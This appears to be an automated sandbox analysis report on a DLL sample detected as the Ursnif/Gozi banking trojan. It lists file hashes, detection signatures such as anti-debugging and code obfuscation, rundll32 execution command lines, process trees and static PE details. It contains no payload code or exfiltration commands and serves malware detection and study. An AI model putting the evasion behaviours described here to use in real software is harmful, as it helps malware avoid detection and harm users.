Play interactive tour

Edit tour

Analysis Report CJxeLKU314.dll

Overview

General Information

Sample Name:	CJxeLKU314.dll
Analysis ID:	408918
MD5:	e4c188ae2a8d453b361d339022a04221
SHA1:	0f2375eeb872fd5d5021145a56eae8529cedfbdb
SHA256:	0fa5df74d9d08845440766c204ae874a81a189b9856e2b841665eb9054040b4b
Tags:	dllGoziISFBUrsnif
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	48
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Ursnif

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found potential string decryption / allocating functions

PE file contains an invalid checksum

Program does not show much activity (idle)

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

loaddll32.exe (PID: 2964 cmdline: loaddll32.exe 'C:\Users\user\Desktop\CJxeLKU314.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 4036 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\CJxeLKU314.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 4672 cmdline: rundll32.exe 'C:\Users\user\Desktop\CJxeLKU314.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cmd.exe (PID: 5504 cmdline: C:\Windows\system32\cmd.exe /c cd Island MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 4308 cmdline: C:\Windows\system32\cmd.exe /c cd Matter m MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 4132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

rundll32.exe (PID: 4676 cmdline: rundll32.exe C:\Users\user\Desktop\CJxeLKU314.dll,Connectdark MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cmd.exe (PID: 5984 cmdline: C:\Windows\system32\cmd.exe /c cd Island MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 1140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 4924 cmdline: C:\Windows\system32\cmd.exe /c cd Matter m MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

rundll32.exe (PID: 6164 cmdline: rundll32.exe C:\Users\user\Desktop\CJxeLKU314.dll,Mindlake MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cmd.exe (PID: 6176 cmdline: C:\Windows\system32\cmd.exe /c cd Island MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6236 cmdline: C:\Windows\system32\cmd.exe /c cd Matter m MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

rundll32.exe (PID: 6224 cmdline: rundll32.exe C:\Users\user\Desktop\CJxeLKU314.dll,Porthigh MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cmd.exe (PID: 6248 cmdline: C:\Windows\system32\cmd.exe /c cd Island MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6348 cmdline: C:\Windows\system32\cmd.exe /c cd Matter m MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

rundll32.exe (PID: 6336 cmdline: rundll32.exe C:\Users\user\Desktop\CJxeLKU314.dll,Problemscale MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cmd.exe (PID: 6600 cmdline: C:\Windows\system32\cmd.exe /c cd Island MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6740 cmdline: C:\Windows\system32\cmd.exe /c cd Matter m MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

rundll32.exe (PID: 6580 cmdline: rundll32.exe C:\Users\user\Desktop\CJxeLKU314.dll,WingGrass MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cmd.exe (PID: 6648 cmdline: C:\Windows\system32\cmd.exe /c cd Island MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6832 cmdline: C:\Windows\system32\cmd.exe /c cd Matter m MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6704 cmdline: C:\Windows\system32\cmd.exe /c cd Island MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 6840 cmdline: C:\Windows\system32\cmd.exe /c cd Matter m MD5: F3BDBE3BB6F734E357235F4D5898582D)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

Source: CJxeLKU314.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: CJxeLKU314.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: c:\938\follow-Record\Suffix\observe-element\force.pdb source: loaddll32.exe, 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp, rundll32.exe, 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp, rundll32.exe, 00000014.00000002.608296058.000000006DE3A000.00000002.00020000.sdmp, rundll32.exe, 00000018.00000002.538841611.000000006DE3A000.00000002.00020000.sdmp, CJxeLKU314.dll

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match

File source: 3.2.rundll32.exe.6ddb0000.1.unpack, type: UNPACKEDPE

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match

File source: 3.2.rundll32.exe.6ddb0000.1.unpack, type: UNPACKEDPE

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6DDB2485 NtQueryVirtualMemory,

3_2_6DDB2485

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DDF1C3C	0_2_6DDF1C3C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DDF3E00	0_2_6DDF3E00
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DE184BB	0_2_6DE184BB
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DE267D9	0_2_6DE267D9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DE05150	0_2_6DE05150
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DE0E079	0_2_6DE0E079
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DE20396	0_2_6DE20396
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DE302BC	0_2_6DE302BC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6DDF1C3C	2_2_6DDF1C3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6DDF3E00	2_2_6DDF3E00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6DE184BB	2_2_6DE184BB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6DE267D9	2_2_6DE267D9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6DE05150	2_2_6DE05150
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6DE0E079	2_2_6DE0E079
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6DE20396	2_2_6DE20396
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6DE302BC	2_2_6DE302BC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6DDB2264	3_2_6DDB2264
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_6DDF1C3C	15_2_6DDF1C3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_6DDF3E00	15_2_6DDF3E00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_6DE184BB	15_2_6DE184BB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_6DE267D9	15_2_6DE267D9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_6DE05150	15_2_6DE05150
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_6DE0E079	15_2_6DE0E079
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_6DE20396	15_2_6DE20396
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_6DE302BC	15_2_6DE302BC

Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 6DDF0990 appears 34 times
Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 6DDF00AC appears 100 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6DDF0990 appears 68 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6DDF00AC appears 200 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6DE123A9 appears 36 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6DDF00E0 appears 58 times

Source: CJxeLKU314.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: classification engine

Classification label: mal48.troj.winDLL@55/0@0/0

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5972:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6188:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6636:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5664:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4132:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6268:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6684:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6868:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6260:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6804:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1140:120:WilError_01

Source: CJxeLKU314.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\CJxeLKU314.dll,Connectdark

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\CJxeLKU314.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\CJxeLKU314.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\CJxeLKU314.dll,Connectdark
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\CJxeLKU314.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\CJxeLKU314.dll,Mindlake
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\CJxeLKU314.dll,Porthigh
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\CJxeLKU314.dll,Problemscale
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\CJxeLKU314.dll,WingGrass
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\CJxeLKU314.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\CJxeLKU314.dll,Connectdark	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\CJxeLKU314.dll,Mindlake	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\CJxeLKU314.dll,Porthigh	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\CJxeLKU314.dll,Problemscale	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\CJxeLKU314.dll,WingGrass	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\CJxeLKU314.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: CJxeLKU314.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: CJxeLKU314.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: CJxeLKU314.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: CJxeLKU314.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: CJxeLKU314.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: CJxeLKU314.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: CJxeLKU314.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: CJxeLKU314.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Source: CJxeLKU314.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: CJxeLKU314.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: CJxeLKU314.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: CJxeLKU314.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: CJxeLKU314.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6DDB1F31 LoadLibraryA,GetProcAddress,

3_2_6DDB1F31

Source: CJxeLKU314.dll

Static PE information: real checksum: 0xf3990 should be: 0xf6bb8

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DDF09D6 push ecx; ret	0_2_6DDF09E9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DDF0075 push ecx; ret	0_2_6DDF0088
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6DDF09D6 push ecx; ret	2_2_6DDF09E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6DDF0075 push ecx; ret	2_2_6DDF0088
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6DDB2253 push ecx; ret	3_2_6DDB2263
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6DDB2200 push ecx; ret	3_2_6DDB2209
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_6DDF09D6 push ecx; ret	15_2_6DDF09E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_6DDF0075 push ecx; ret	15_2_6DDF0088

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match

File source: 3.2.rundll32.exe.6ddb0000.1.unpack, type: UNPACKEDPE

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6DE11F6D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6DE11F6D

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6DDB1F31 LoadLibraryA,GetProcAddress,

3_2_6DDB1F31

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DE1966F mov eax, dword ptr fs:[00000030h]	0_2_6DE1966F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6DE1966F mov eax, dword ptr fs:[00000030h]	2_2_6DE1966F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_6DE1966F mov eax, dword ptr fs:[00000030h]	15_2_6DE1966F

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DE11F6D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6DE11F6D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DDF07A7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6DDF07A7
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DDF0288 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6DDF0288
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6DE11F6D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6DE11F6D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6DDF07A7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6DDF07A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6DDF0288 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_6DDF0288
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_6DE11F6D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_6DE11F6D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_6DDF07A7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_6DDF07A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_6DDF0288 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	15_2_6DDF0288

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\CJxeLKU314.dll',#1	Jump to behavior
